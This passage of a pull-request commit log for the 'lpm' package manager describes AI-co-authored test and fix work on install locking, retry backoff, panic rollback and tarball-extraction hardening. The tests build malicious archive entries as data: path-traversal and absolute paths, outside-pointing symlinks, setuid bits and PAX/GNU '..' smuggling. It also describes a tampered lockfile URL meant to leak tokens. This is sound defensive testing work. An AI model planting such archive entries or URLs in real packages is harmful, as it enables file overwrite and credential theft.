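        Some(_) => TrustOutcome::BindingDrift,
    }
}
```

Under this model, a fixture that writes a made-up hash into the manifest is listed but never trusted, which matches the empty `packages[]` the flow originally saw.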
Cross-command flow #7 (env push → env pull cross-machine) — full
byte-equality round-trip now lands:
- Added `MockRegistry::with_stateful_personal_sync(vault_id,
bearer)` to share `Arc<Mutex<Option<StoredSyncBlob>>>` between
POST and GET handlers on `/api/vaults/{vault_id}/sync`. POST
captures encryptedBlob + wrappedKey + bumps the version; GET
returns the stored payload signed with the bearer's HMAC. A
fresh GET before any POST returns 404 — the natural "machine B
pulls before machine A pushed" shape.
- Flow #7 now drives two TempProjects sharing this mock. Both
HOMEs are seeded with the same `<HOME>/.lpm/.vault-key` (32-byte
hex, the cryptographic outcome that real pairing produces) +
the same paired session bearer. Machine A: `env set` → `env push`.
Machine B: `env pull` → `env get --reveal`. The revealed
plaintext must byte-equal the value machine A pushed.
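The shared-state idea behind the stateful sync mock can be sketched without any HTTP machinery. `SyncState` and `StoredBlob` below are hypothetical simplifications (no wrapped key, no HMAC signing, no wiremock handlers); they only show how one `Arc<Mutex<Option<...>>>` lets a POST handler and a GET handler observe the same blob.

```rust
use std::sync::{Arc, Mutex};

/// Simplified stored payload (the real one also carries a wrapped key).
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct StoredBlob {
    pub version: u64,
    pub encrypted_blob: Vec<u8>,
}

/// Cloneable handle; every clone points at the same slot.
#[derive(Clone, Default)]
pub struct SyncState(Arc<Mutex<Option<StoredBlob>>>);

impl SyncState {
    /// POST side: store the blob and bump the version.
    pub fn post(&self, encrypted_blob: Vec<u8>) -> u64 {
        let mut slot = self.0.lock().unwrap();
        let version = slot.as_ref().map_or(1, |b| b.version + 1);
        *slot = Some(StoredBlob { version, encrypted_blob });
        version
    }

    /// GET side: `None` models the 404 returned before any POST.
    pub fn get(&self) -> Option<StoredBlob> {
        self.0.lock().unwrap().clone()
    }
}
```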
scenarios_by_file partitions populated for shared test files:
- id 83 lpm run `<script>` — run.rs: 14
- id 84 lpm run --filter / --all / --affected — run.rs: 7
- id 87 lpm lint — tools.rs: 5
- id 88 lpm fmt (write) — tools.rs: 3
- id 89 lpm fmt --check — tools.rs: 1
- id 91 lpm test — tools.rs: 7
- id 96 lpm env init — env_local.rs: 1
- id 98 lpm env set/get/delete — env_local.rs: 6
- id 99 lpm env import/export/print/copy — env_local.rs: 4
- id 100 lpm env diff/validate/check — env_local.rs: 4
Full CI gate green (workspace target, separate CARGO_TARGET_DIR):
- cargo clippy --workspace --all-targets -- -D warnings clean
- cargo fmt --check clean
- grep -r 'fancy-regex' crates/*/Cargo.toml (none)
- cargo build --workspace clean
- cargo nextest run --workspace --exclude lpm-integration-tests
6397/6397 pass
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 14, 2026
…ix (#58)
* test(workflows): pin concurrency + recovery contracts for lpm install
Adds tests/workflows/tests/install_concurrency.rs with 13 falsifiable
tests covering production failure modes that had zero coverage:
Category A (process racing):
  * two concurrent installs on same project (pins finding-#77 floor)
  * install + concurrent store-clean serialize via shared/exclusive
    store_lock (probed via try_with_exclusive_lock on the actual lock
    file, not a directory-existence proxy)
  * two concurrent `lpm install -g` via global_tx_lock; proves final
    manifest + WAL coherence under serialized commits
Category B (interruption recovery):
  * kill mid-tarball-fetch leaves no .lpm/install-hash
  * next `lpm install` converges to a coherent end state
Category C (network faults):
  * tarball 503 → 200 succeeds after retry (counting Respond impl)
  * metadata 404 fails immediately without retry (<2s wall-clock)
Category D (filesystem faults):
  * readonly project dir fails with actionable error (no panic);
    POSIX-only via #[cfg(unix)], RAII guard restores permissions
  * `<project>/.lpm` planted as a regular file fails clearly
Category E (partial state recovery):
  * stale install-hash triggers re-resolve + refetch
  * partial node_modules re-links to full state
  * truncated lpm.lockb either recovers or fails cleanly (no panic)
Category F (WAL recovery hook):
  * torn WAL tail (3 garbage bytes) gets truncated by the dispatcher's
    recovery hook before the command runs; idempotent on re-invocation
Support helper refactor (same commit so the new helper has callers):
  * extracts env-isolation set into `LpmEnvSink` trait +
    `apply_lpm_env(cmd, project)` shared by `lpm()` (assert_cmd) and
    the new `lpm_spawnable()` / `lpm_spawnable_with_registry()`
    (std::process::Command, supports Child::kill())
  * trait impl on both Command variants ensures the two helpers cannot
    drift on the ~30 env knobs that gate test isolation
Surfaced findings during this work:
  * #77 (no project-level install lock): concurrent installs silently
    drop one side's work AND/OR fail with atomic-rename races
    (3 observed failure modes documented in findings.md). Fix shape:
    LpmRoot::project_install_lock + with_exclusive_lock_async wrap.
  * #78 (retry-backoff has no test-friendly knob): retry-exhaustion
    tests take 15s+. Fix shape: LPM_RETRY_BACKOFF_MS_OVERRIDE env in
    debug builds.
CI gate locally green:
  clippy --workspace --all-targets -- -D warnings: clean
  cargo fmt --check: clean
  fancy-regex ban: empty
  cargo build --workspace: clean
  cargo nextest run --workspace --exclude lpm-integration-tests:
    6439 passed, 7 skipped, 1 leaky (pre-existing)
Deferred (filed under "next session" in the followup plan):
  B.3 (kill doesn't tear lockfile): subsumed by B.1/B.2
  B.4 (panic injection): needs LPM_TEST_PANIC_AT env hook
  C.2 (retry exhaustion): blocked by finding #78
  C.3 (truncated body): needs custom Respond with Content-Length mismatch
  D.3 (disk-full simulation): no portable mechanism
  F.2, F.3 (orphan WAL, torn WAL with real records): needs framed-WAL
    construction helpers
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* test(workflows): pin lpm.lock well-formedness + recovery skip-on-contention
Closes B.3 and F.2 of the concurrency tranche: 13 → 15 tests, meeting
the "≥15 of 21" acceptance criterion for Item 2.
B.3: `install_killed_mid_pipeline_leaves_well_formed_or_absent_lockfile`:
Exercises two SIGKILL windows on the install pipeline: fresh project
and project with a committed lpm.lock from a prior install. After each
kill, asserts the on-disk lpm.lock is either absent OR parses as TOML.
Never half-written. Adds `toml = { workspace = true }` as a
workflow-tests dev-dep for the parse assertion. Helper
`assert_lockfile_well_formed_or_absent` shared between both windows.
F.2: `lpm_command_skips_recovery_when_another_lpm_holds_global_tx_lock`:
Validates the dispatcher's `try_with_exclusive_lock` idempotent-skip
path at `main.rs:2531`. A background thread acquires `global_tx_lock`
via `lpm_common::with_exclusive_lock` and blocks on a channel. With the
lock held, runs `lpm global list` against a project with a torn-WAL
prefix and asserts the WAL bytes are UNCHANGED (skip arm fired,
recovery did not run). Then releases the lock and re-runs; asserts the
WAL is now truncated (recovery defers correctly to the next lock-free
invocation). Exercises both branches of the `try_with_exclusive_lock`
Ok(None) / Ok(Some) arm.
CI gate locally green:
  cargo clippy --workspace --all-targets -- -D warnings: clean
  cargo fmt --check: clean
  cargo nextest run --workspace --exclude lpm-integration-tests:
    6441/6441 passed, 7 skipped
  5x parallel re-run of install_concurrency: 15/15 stable each run
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* test(workflows): pin truncated-tarball + orphan-WAL recovery contracts
Two new tests in tests/workflows/tests/install_concurrency.rs:
- C.3 tarball_connection_dropped_mid_body_fails_or_retries: a custom
wiremock Respond impl serves half a tarball with a Content-Length
header naming the full length. Pins the install pipeline's
retry-then-fail behavior on transport-class failures (~14s wall-clock
for the full 4-attempt retry schedule). Hyper 1.9 server-side panics
on the Content-Length lie, dropping the connection, which is a valid
surrogate for a broken upstream / CDN dropping mid-body. Surfaced 8
tarball GETs per install (deterministic, 3-of-3 reproducer), explained
by two distinct download_tarball_* call sites in install.rs each
running the 4-attempt retry budget.
- F.3 lpm_command_with_orphan_pending_tx_emits_recovery_banner: plants
both halves of an orphan transaction (WAL Intent record without
matching Commit/Abort + matching [pending.<pkg>] row in manifest.toml
pointing at a non-existent install root) and asserts the dispatcher's
recovery hook fires the RolledBack banner from main.rs:2543. Sets
RUST_LOG=lpm=info to lift the default lpm=warn filter so the
tracing::info! line surfaces. Adds lpm-global as a workflow dev-dep
for WalWriter / IntentPayload / write_for. Pins post-state: orphan
pending row gone, no spurious active row.
Together these close the C.3 and F.3 gaps in Item 2 of the test
coverage follow-up plan: 17/21 scenarios pinned (was 15/21). The four
remaining items all need source-side hooks (LPM_TEST_PANIC_AT,
LPM_RETRY_BACKOFF_MS_OVERRIDE, container infra) and are out of scope
for this tranche.
Full CI gate green: clippy clean, fmt clean, fancy-regex empty,
6443/6443 nextest pass (was 6441 pre-tranche).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* test(workflows): pin tarball-extraction security contracts at install tier
New file tests/workflows/tests/tarball_security.rs ships phase 1 of
Item 3 (tarball-extraction security): 5 of 10 planned tests covering
the most distinct security contracts at the install-pipeline tier.
Each test constructs its malicious tarball in-line via tar::Builder
(no checked-in fixtures), serves it through MockRegistry, and runs
lpm install end-to-end so any pipeline-level regression that bypasses
the extractor's hardening is caught.
Tests landed:
- #1 tarball_with_dot_dot_path_entry_is_rejected_by_install: pokes
package/../escape.txt into the raw tar header bytes; install fails
with "path traversal detected"; outside sentinel never created.
- #3 tarball_with_absolute_path_entry_is_normalized_to_relative_under_package_dir:
renamed from "rejected" to reflect actual contract. The extractor's
strip_first_component consumes the RootDir; an entry like
/etc/lpm-pwned.txt extracts as node_modules/<pkg>/etc/lpm-pwned.txt.
Install SUCCEEDS; literal /etc/lpm-pwned.txt is never written.
Defensible: malformed-but-safe input normalized rather than refused.
- #2 tarball_with_symlink_to_outside_path_is_silently_skipped: renamed.
The is_file() gate at lib.rs:398 silently drops symlinks; install succeeds with byte-identical outside sentinel. - #5 tarball_with_hard_link_to_outside_file_is_silently_skipped — renamed. Same is_file() gate; hardlinks silently skipped; outside victim file unmodified. - #8 tarball_with_setuid_executable_extracts_with_setuid_bit_stripped (POSIX-only) — tarball entry mode 0o4755 extracts as 0o755. SUID, SGID, and sticky bits all cleared via set_preserve_permissions(false) + the explicit `0o644 | exec_bits` mode set after write. Exec bits preserved. Three tests carry a "plan-vs-actual" docstring section explaining why the rename is defensible — the actual extractor contract differs from the plan's prescribed phrasing in safe ways, not in regression-grade ways. No findings filed. Phase 2 (5 remaining tests: Unicode normalization, device file, FIFO, zero-byte sanity, OS-max path) is deferred to a follow-up tranche with rationale + lift estimate documented in the plan. None blocks phase 1 acceptance. Pre-merge gate green: clippy clean, fmt clean, fancy-regex empty, 6448/6448 nextest pass (was 6443; +5 for the new tests). 0.18s wall- clock for the full file. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(install): per-project lock prevents concurrent-install data loss Closes finding #77. Two `lpm install <pkg>` invocations on the same project no longer race on the manifest snapshot+commit window. Pre-fix, both processes acquired only a SHARED store_lock and proceeded in parallel. Each opened its own per-process ManifestTransaction snapshot of the pre-edit package.json, staged its own dep on top, and ran the install pipeline. Whoever wrote package.json + lpm.lock last won; the other process's edits — including its node_modules link — silently vanished. Both processes still exited 0 with success-path output. CI scripts that ran two installs in parallel saw no signal of the data loss. 
The fix introduces: - crates/lpm-common/src/paths.rs::project_install_lock(project_dir): free helper returning <project_dir>/.lpm/.install.lock. Re-exported from crates/lpm-common/src/lib.rs. - run_add_packages and run_install_filtered_add in crates/lpm-cli/src/commands/install.rs now wrap the snapshot → stage → install → finalize → commit window in with_exclusive_lock_async against the project lock. The lock is per-project (no cross-project contention) and held across all ?-early-exits via the async block's return. For the workspace path, the lock sits at the discovered workspace root (not per-member) so two concurrent `lpm install --filter <member>` invocations on the same workspace serialize without per-member deadlock-ordering complexity. run_with_options (the inner install pipeline) does NOT acquire this lock — it's called from inside both run_add_packages's wrap and from many other commands; double-acquiring the same fd-lock would deadlock in-process. Deferred (phase 2, not exercised by A.1): lpm add (add.rs:723-904) has a similar 180-line transaction with recursive Swift handling. Wrapping it is invasive and the race surface is theoretical (users don't typically run `lpm add` and `lpm install` concurrently). Defer to a separate tranche if a concurrent `lpm add` × `lpm install` race is ever observed. Test contract tightening (bug-first per CLAUDE.md): two_concurrent_installs_on_same_project_leave_well_formed_manifest in tests/workflows/tests/install_concurrency.rs went from "at-least-one survives + manifest is well-formed JSON" (the floor) to "BOTH installs succeed, BOTH packages present in package.json deps, BOTH packages linked in node_modules/" (the contract). Pre-fix: 1/1 fail (pkg-b silently dropped). Post-fix: 5/5 pass with no flakes (~1.2s wall-clock each — install B observes pkg-a's commit and reports "Resolved 2 packages"). Pre-merge gate green: clippy --workspace --all-targets clean, fmt clean, fancy-regex empty, 6448/6448 nextest pass. 
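As a rough illustration of the lock placement described in this commit, the sketch below derives the lock path from a project directory and prefers the workspace root when one is discovered. `project_install_lock` and the `.lpm/.install.lock` location come from the commit message; `install_lock_for` and its `workspace_root` parameter are hypothetical names used only here, and the real code wraps the critical section in `with_exclusive_lock_async`, which is not reproduced.

```rust
use std::path::{Path, PathBuf};

/// Lock file guarding the snapshot -> stage -> install -> finalize -> commit
/// window for one project: `<project_dir>/.lpm/.install.lock`.
fn project_install_lock(project_dir: &Path) -> PathBuf {
    project_dir.join(".lpm").join(".install.lock")
}

/// Hypothetical helper: filtered workspace installs lock at the workspace
/// root, so every member of the same workspace contends on one file.
fn install_lock_for(project_dir: &Path, workspace_root: Option<&Path>) -> PathBuf {
    project_install_lock(workspace_root.unwrap_or(project_dir))
}
```

Two members of the same workspace resolve to the same lock file, which is why concurrent `--filter` installs serialize without any per-member lock ordering.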
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(registry): test-only retry-backoff override env knob Closes finding #78 + lands C.2 (`tarball_503_exhausts_retries_fails_with_http_status`). Pre-fix, retry-exhaustion tests were blocked: the registry client's backoff schedule (1+2+4+8s, capped at 10s) made every retry-exhaustion test take ~15s per fetch site (~28s with the install pipeline's 2 distinct download_tarball_* call sites). MAX_RETRIES, RETRY_BASE_DELAY, and RETRY_MAX_DELAY are private const with no env override. C.2 therefore had to be #[ignore]-gated behind LPM_RUN_SLOW_TESTS=1, and the retry-exhaustion contract went unproven on `cargo nextest run`. The fix introduces: - crates/lpm-registry/src/client.rs::backoff_override(): reads LPM_RETRY_BACKOFF_MS_OVERRIDE (a u64 ms value) gated by cfg!(debug_assertions) || LPM_TEST_MODE=1. Returns Some(Duration) when both conditions hold; None otherwise. Production retry policy is immune — release builds without LPM_TEST_MODE=1 silently ignore the env. - backoff_delay(attempt) consults the override before computing the exponential schedule. - The two 429 Retry-After sleep sites also consult the override so a future 429-flood retry-exhaustion test wouldn't hang on the server-supplied header. C.2 test landed alongside (bug-first per CLAUDE.md): - Mock returns 503 on every tarball request — no recovery path. - Test sets LPM_RETRY_BACKOFF_MS_OVERRIDE=10 on the lpm subprocess. - Asserts: install fails non-zero, no panic, ≥4 attempts (proves the retry loop fired), elapsed < 2s (load-bearing — without the knob this fails at ~14s), stderr contains an actionable HTTP-class noun (503 / status / http / network / etc). - Surfaces 8 tarball GETs per install (4 attempts × 2 distinct download_tarball_* call sites — matches C.3's observation). Pre-fix verification: same C.2 against the unfixed client.rs failed on the elapsed assertion at 14.04s (knob ignored). Post-fix: passes in 1.6s cold / 0.1s warm. 
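A minimal sketch of the gated override, assuming a 1s base delay that doubles per attempt and a 10s cap (values inferred from the "1+2+4+8s, capped at 10s" schedule quoted above). The constant names mirror the commit message; the zero-based attempt index, the split into a pure `parse_backoff_override` helper, and the explicit `override_delay` parameter are assumptions made so the logic can be exercised without touching the process environment.

```rust
use std::time::Duration;

const RETRY_BASE_DELAY: Duration = Duration::from_secs(1);
const RETRY_MAX_DELAY: Duration = Duration::from_secs(10);

/// Pure core: the override only applies when the test gate is open and the
/// raw value parses as a u64 millisecond count.
fn parse_backoff_override(raw: Option<&str>, gate_open: bool) -> Option<Duration> {
    if !gate_open {
        return None;
    }
    raw?.trim().parse::<u64>().ok().map(Duration::from_millis)
}

/// Environment-reading wrapper: debug builds or LPM_TEST_MODE=1 open the gate.
fn backoff_override() -> Option<Duration> {
    let gate_open = cfg!(debug_assertions)
        || std::env::var("LPM_TEST_MODE").map(|v| v == "1").unwrap_or(false);
    let raw = std::env::var("LPM_RETRY_BACKOFF_MS_OVERRIDE").ok();
    parse_backoff_override(raw.as_deref(), gate_open)
}

/// Exponential schedule (1s, 2s, 4s, 8s, then capped), unless overridden.
fn backoff_delay(attempt: u32, override_delay: Option<Duration>) -> Duration {
    if let Some(delay) = override_delay {
        return delay;
    }
    let factor = 2u32.saturating_pow(attempt);
    RETRY_BASE_DELAY.saturating_mul(factor).min(RETRY_MAX_DELAY)
}
```

A caller would pass `backoff_override()` into `backoff_delay`; with the gate closed the exponential schedule is untouched, which matches the claim that release builds ignore the env var.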
5/5 passes with no flakes. Pre-merge gate green: clippy --workspace --all-targets clean, fmt clean, fancy-regex empty, 6449/6449 nextest pass (was 6448 pre-fix; +1 for C.2). Item 2 of the test-coverage-followup-plan now at 18/21 (was 17/21). Both findings #77 and #78 fixed in production. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * test(workflows): tarball-security phase 2 — Unicode, device, FIFO, zero-byte, long-path Adds 5 more tests to tarball_security.rs, completing Item 3 of the test-coverage follow-up plan. Each test pins the actual extractor contract under malicious-or-edge-case tarball shapes that reach the install pipeline through MockRegistry. Tests landed: - #4 tarball_with_unicode_lookalike_parent_dir_extracts_safely_as_literal_bytes — renamed from "_normalization_traversal_rejected" to reflect the actual contract. Tarball entry path uses full-width dots U+FF0E `..` (bytewise NOT ASCII `..`). Component::ParentDir is byte-exact, so `..` becomes Component::Normal. Install SUCCEEDS; `..` materializes as a literal directory under node_modules/<pkg>/; outside sentinel byte-identical. Defensible because Path::components() doesn't NFKC-normalize on POSIX. - #6 tarball_with_character_device_entry_is_silently_skipped (POSIX-only). EntryType::Char with /dev/null-shaped major/minor. Same is_file() gate as symlinks/hardlinks — silently skipped. Install SUCCEEDS; no device file at the expected path. - #7 tarball_with_fifo_entry_is_silently_skipped (POSIX-only). EntryType::Fifo. Same posture as #6. - #9 tarball_with_zero_byte_regular_file_extracts_as_empty_file. Sanity check that empty files still extract correctly (legitimate npm shape: .gitkeep, license placeholders). - #10 tarball_with_single_path_component_exceeding_name_max_fails_cleanly. 300-byte single-component name, well over POSIX NAME_MAX=255. Tar wire format succeeds via GNU long-name extension; the FILESYSTEM rejects on extraction (ENAMETOOLONG). 
Extractor wraps as LpmError::Io → install fails non-zero with the OS error visible and an actionable noun in stderr. Three of the five tests are renamed to reflect actual extractor contract vs the plan's prescribed phrasing — same "plan-vs-actual" docstring pattern as phase 1. No findings filed; all 10 contracts across phase 1 + 2 are defensible-as-implemented. Pre-merge gate green: clippy --workspace --all-targets clean, fmt clean, fancy-regex empty, 6454/6454 nextest pass (was 6449 pre-tranche; +5 for the new tests). Full file 0.2s wall-clock for all 10 tests. Item 3 now COMPLETE (10/10). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * test(workflows): cross-command flows Item 4 — migrate→rebuild + workspace filter isolation Closes Item 4 of the test-coverage-followup-plan at 6/6 (target was ≥5). Two additions to tests/workflows/tests/cross_command_flows.rs: - Plan #1 — extended flow_migrate_install_audit_lockfile_round_trips with a `lpm rebuild --dry-run --policy=deny` step. Pins the full migrate → install → audit → rebuild lifecycle. Asserts the rebuild step exits 0 + does not mutate the post-audit state (lpm.lock + lpm.lockb still present). Catches regressions where rebuild's lockfile or build-state parser breaks against a freshly-migrated manifest. - Plan #5 — added flow_workspace_install_filter_member_a_does_not_mutate_member_b (new test, 159 LOC). Pins the workspace-member isolation contract using the workspace-monorepo fixture (3 members: app, core, utils): 1. Initial filtered install on @test/core (re-pinning its existing semver dep) populates core's per-member quadruple: lpm.lock=319 B, lockb=230 B, install_hash=118 B. 2. Snapshot core's full quadruple. 3. Run `lpm install chalk@5.3.0 --filter @test/app` to add a new dep to app ONLY. 4. Assert app's package.json gained chalk; core's quadruple (package.json + lpm.lock + lpm.lockb + install-hash) is BYTE-IDENTICAL post-install; chalk does NOT appear in core's node_modules/. 
Catches a regression where a per-member filtered install accidentally also mutates a sibling member's package.json / lockfile / install-hash — a real bug class because run_install_filtered_add shares the workspace-root project lock (added in #77 fix) and could over-snapshot if the target-set computation drifts. Helper `mount_pkg_full(mock, name, version)` factors out the three-step metadata + batch-metadata + tarball mount so the test body stays readable. Other 4 plan flows already covered pre-tranche: - Plan #2: flow_add_install_graph_added_dep_visible - Plan #3: flow_install_patch_patch_commit_install_persists_patch - Plan #4: flow_token_rotate_publish_dry_run_picks_new_token - Plan #6: flow_install_upgrade_major_audit_picks_new_version Pre-merge gate green: clippy --workspace --all-targets clean, fmt clean, fancy-regex empty, 6455/6455 nextest pass (was 6454; +1 for the new flow). Plan #5 stable across 5/5 reruns at ~0.11s each. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * test(install): LPM_TEST_PANIC_AT hook + B.4 panic-rollback contract Adds a deterministic panic-injection hook to the install pipeline + unblocks the long-deferred B.4 contract test for ManifestTransaction Drop-based rollback on panic. The hook (`maybe_test_panic(stage)` in crates/lpm-cli/src/commands/install.rs) reads LPM_TEST_PANIC_AT and panics when the env value matches the stage name. Gated to `cfg!(debug_assertions) || LPM_TEST_MODE=1` — same pattern as the #78 retry-backoff override. Production builds without LPM_TEST_MODE=1 silently treat the env as no-op. 
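The gating described for `maybe_test_panic` could look roughly like the following. This is a sketch under assumptions, not the code in `install.rs`: the pure `should_panic_at` helper is hypothetical, and the panic message format is inferred from the stderr substrings that B.4 is said to assert on.

```rust
/// Pure decision: panic only when the gate is open and the requested stage
/// (the value of LPM_TEST_PANIC_AT) equals the stage being passed through.
fn should_panic_at(stage: &str, requested: Option<&str>, gate_open: bool) -> bool {
    gate_open && requested == Some(stage)
}

/// Environment-reading wrapper, called at each wired stage of the pipeline.
fn maybe_test_panic(stage: &str) {
    // Debug builds, or any build with LPM_TEST_MODE=1, honor the hook.
    let gate_open = cfg!(debug_assertions)
        || std::env::var("LPM_TEST_MODE").map(|v| v == "1").unwrap_or(false);
    let requested = std::env::var("LPM_TEST_PANIC_AT").ok();
    if should_panic_at(stage, requested.as_deref(), gate_open) {
        panic!("LPM_TEST_PANIC_AT={stage}");
    }
}
```

Keeping the decision in a pure function means the gate can be unit-tested without mutating process-wide environment variables.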
Wired 4 stages in `run_add_packages`:
- "after-snapshot": manifest unchanged; Drop is no-op
- "after-stage": placeholder `*` written to package.json (load-bearing)
- "after-install": pipeline complete; manifest still has `*`
- "after-finalize": concrete versions written; pre-commit only

The hook unblocks B.4 (`install_panics_mid_pipeline_rollback_restores_manifest`), deferred since the original Item 2 tranche because there was no deterministic way to trigger a panic mid-install from a workflow test. Recoverable errors fire `?`-rollback (covered by E.1/E.2/E.3); SIGKILL bypasses Drop entirely (B.1/B.2/B.3 cover that). The panic path was the missing rollback proof.

B.4 sets LPM_TEST_PANIC_AT=after-stage and asserts:
- process exits non-zero (panic propagates to runtime)
- stderr contains `"panicked at"` AND `"LPM_TEST_PANIC_AT=after-stage"`
- package.json BYTE-IDENTICAL to pre-stage (Drop ran on unwind, snapshot bytes restored; load-bearing)
- the new pkg is NOT in dependencies (placeholder rollback worked)
- .lpm/install-hash absent (invalidate-on-rollback)
- lpm.lock absent (matched optional snapshot's None pre-state)

Catches a regression where:
- panic = "abort" added to release profile (no Drop on panic)
- ManifestTransaction Drop logic stops restoring snapshot bytes
- The `lpm install` snapshot+commit window grows without re-wiring Drop

Test runs in 0.07s warm. 5/5 stable across reruns.

Pre-merge gate green: clippy --workspace --all-targets clean, fmt clean, fancy-regex empty, 6456/6456 nextest pass (was 6455; +1 for B.4). install_concurrency now at 19/19. Item 2 of test-coverage-followup-plan moves to 19/21; only A.2 (no contract) and D.3 (needs container infra) remain deferred indefinitely.
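The Drop-based rollback that B.4 pins can be sketched in memory as follows. The internals of `ManifestTransaction` are not shown in this PR, so the fields, the `begin`/`stage`/`commit` methods, and the `run_staged_install` driver are all hypothetical; the only behavior taken from the commit message is "snapshot on entry, restore the snapshot bytes on unwind unless committed".

```rust
use std::panic::{self, AssertUnwindSafe};

/// In-memory stand-in for a manifest transaction: snapshots on begin,
/// restores the snapshot in Drop unless `commit` was called.
struct ManifestTransaction<'a> {
    manifest: &'a mut String,
    snapshot: String,
    committed: bool,
}

impl<'a> ManifestTransaction<'a> {
    fn begin(manifest: &'a mut String) -> Self {
        let snapshot = manifest.clone();
        Self { manifest, snapshot, committed: false }
    }

    fn stage(&mut self, new_contents: &str) {
        self.manifest.clear();
        self.manifest.push_str(new_contents);
    }

    fn commit(mut self) {
        // Drop still runs when `self` goes out of scope, but becomes a no-op.
        self.committed = true;
    }
}

impl Drop for ManifestTransaction<'_> {
    fn drop(&mut self) {
        if !self.committed {
            self.manifest.clear();
            self.manifest.push_str(&self.snapshot);
        }
    }
}

/// Stages a placeholder dependency, optionally panics mid-pipeline, then
/// commits. Returns whether the install completed without panicking.
fn run_staged_install(manifest: &mut String, panic_after_stage: bool) -> bool {
    let outcome = panic::catch_unwind(AssertUnwindSafe(|| {
        let mut tx = ManifestTransaction::begin(manifest);
        tx.stage(r#"{"dependencies":{"pkg":"*"}}"#);
        if panic_after_stage {
            panic!("simulated mid-install panic");
        }
        tx.commit();
    }));
    outcome.is_ok()
}
```

The rollback depends on unwinding: with `panic = "abort"` in the build profile, `Drop` never runs, which is the first regression the test is said to catch.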
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(workflows): align MockRegistry tarball URL shape with production /-/ gate Workflow tests mounted tarballs at `/tarballs/{name}-{version}.tgz` — missing the `/-/` path segment that the registry-client's `evaluate_cached_url` gate at [crates/lpm-registry/src/client.rs#L4117] requires (`.tgz` suffix AND `/-/` substring). The gate is a defense-in-depth check that blocks the H1 auth-token leak: a tampered lockfile URL like `/api/admin/foo.tgz` (no `/-/`) would otherwise attach the bearer to a non-registry endpoint. The mismatch produced two test-environment side effects that don't manifest in production: 1. **WARN noise**: every install test that read a tarball URL from the lockfile fast path logged `cached tarball URL for X@Y failed shape check; falling back to on-demand lookup`. Polluted stderr across the suite. 2. **`shape_mismatch_count` defeated**: the registry-client documents this counter as a "BUG signal — the writer should never emit a gate-rejectable URL". Test runs incremented it on every install, making the counter useless for catching real bugs. This commit migrates the mock to the production-shape `/tarballs/{name}/-/{name}-{version}.tgz` everywhere — both the helper methods (`MockRegistry::tarball_path` / `tarball_url`) and the ~60 hard-coded `format!` sites across 14 test files + 1 snapshot. The new `tarball_path` helper is `pub` with a prominent docstring warning future test authors not to re-introduce the legacy shape. Internal mounts in `with_package_and_deps` / `with_package_published_at` / `with_full_package_metadata` all route through it. Post-fix verification: WARN gone, gate `Accepted` path runs, all 691 lpm-workflows tests pass (0 leaky in the latest full-workspace run, down from 1-3 leaky pre-fix — fewer fallback paths firing). 
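To make the shape check concrete, here is a small sketch of the two conditions the commit message attributes to the gate (`.tgz` suffix and a `/-/` segment), next to the production-shape mock path. `has_registry_tarball_shape` is a hypothetical name and is not the real `evaluate_cached_url`, which may check more than this; `tarball_path` follows the format string quoted above but is written as a free function rather than a `MockRegistry` method.

```rust
/// Hypothetical reduction of the gate: a cached tarball URL must end in
/// `.tgz` and contain the `/-/` path segment.
fn has_registry_tarball_shape(url: &str) -> bool {
    url.ends_with(".tgz") && url.contains("/-/")
}

/// Production-shape mock path: `/tarballs/{name}/-/{name}-{version}.tgz`.
fn tarball_path(name: &str, version: &str) -> String {
    format!("/tarballs/{name}/-/{name}-{version}.tgz")
}
```

Under this check the legacy `/tarballs/{name}-{version}.tgz` mount and a tampered `/api/admin/foo.tgz` both fail, while the new mock path passes.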
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * test(workflows): test-coverage-followup tranche — Items 2/3/4/5 Closes the remaining open rows from `private/test-coverage-followup-plan.md` across four items. ~2,600 LOC of new test code + fixture + budget infra. **Item 3 — tarball-security additional candidate surfaces (7 tests in `tarball_security.rs`):** - `tarball_with_pax_path_traversal_rejected` — PAX extended `path` header smuggling `..` is rejected by the extractor's `Component::ParentDir` check after the tar crate resolves the override. - `tarball_with_gnu_longname_traversal_rejected` — symmetric GNU `L` entry; same rejection path. - `tarball_rejects_or_rolls_back_when_later_entry_is_malicious` — pins the `rollback_extraction` contract: valid first entry is cleaned up when a later `..`-traversal entry trips rejection mid-stream. - `tarball_with_duplicate_member_path_rejected_or_deterministic` — pins current last-write-wins contract (defensible; flagged scanner- disagreement risk in test comment). - `tarball_with_truncated_gzip_rolls_back_partial_extract` — half- truncated gzip stream → libdeflate fails cleanly → no partial extract. - `tarball_ignores_uid_gid_ownership_metadata` (POSIX) — bogus uid/gid in tar header is ignored; extracted files owned by process uid. - `tarball_with_sparse_huge_file_rejected_by_declared_size` — manually- constructed tarball with header declaring `MAX_FILE_SIZE + 1` and empty on-wire body; extractor rejects on the pre-check at lib.rs:306 before draining body. **Item 4 — cross-command flows additional candidate surfaces (2 tests in `cross_command_flows.rs`):** - `flow_install_uninstall_install_graph_round_trip` — pins manifest / link / graph hand-off through a full round-trip. - `flow_cache_clean_then_offline_install_uses_store_or_fails_helpfully` — pins the cache/store boundary: `cache clean` must not corrupt offline install; store-side bytes byte-identical after a clean. 
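The `Component::ParentDir` rejection that the Item 3 traversal tests rely on can be approximated with the standard library alone. The sketch below is an assumption about the overall shape, not the extractor's code: `sanitize_entry_path` is a hypothetical name, the first component is stripped unconditionally, and the error string is borrowed from the "path traversal detected" message mentioned in the phase 1 tests.

```rust
use std::path::{Component, Path, PathBuf};

/// Strips the first component (normally `package/`, or a leading root) and
/// rejects any remaining `..` component. The comparison is byte-exact, so
/// Unicode lookalikes of `..` pass through as ordinary directory names.
fn sanitize_entry_path(entry: &str) -> Result<PathBuf, String> {
    let mut out = PathBuf::new();
    for component in Path::new(entry).components().skip(1) {
        match component {
            Component::Normal(part) => out.push(part),
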